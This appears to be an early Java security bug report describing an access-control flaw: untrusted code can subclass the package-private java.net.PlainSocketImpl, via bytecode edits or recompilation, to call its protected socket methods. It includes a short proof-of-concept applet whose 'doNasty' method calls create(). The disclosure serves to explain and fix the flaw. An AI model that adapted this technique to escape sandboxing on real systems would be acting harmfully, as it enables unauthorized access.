This is a very serious security bug which is directly exploitable through getting access to
all the protected methods in PlainSocketImpl. There may be other ways to exploit it.

The problem is that any class can extend a class to which it is not supposed to have access
(for example a class in package COM.microsoft can create a subclass of PlainSocketImpl,
even though PlainSocketImpl is a friendly class in package java.net).

The JDK compiler will not allow such a class to compile, but that is easily bypassed either
by modifying bytecodes, or by recompiling PlainSocketImpl to be public, and then compiling
the attack code.

The following code will compile in an environment where java.net.PlainSocketImpl
is public and will run in an environment where it is friendly.

import java.applet.Applet;

public class TestApplet extends Applet {

    public void init() {
MySocketImpl msi = new MySocketImpl();
msi.doNasty();
    }
}
    

public class MySocketImpl extends java.net.PlainSocketImpl {

    public void doNasty() {
try {
create(true);
} catch (java.io.IOException e) {
}
System.out.println("just called create");
    }
    
}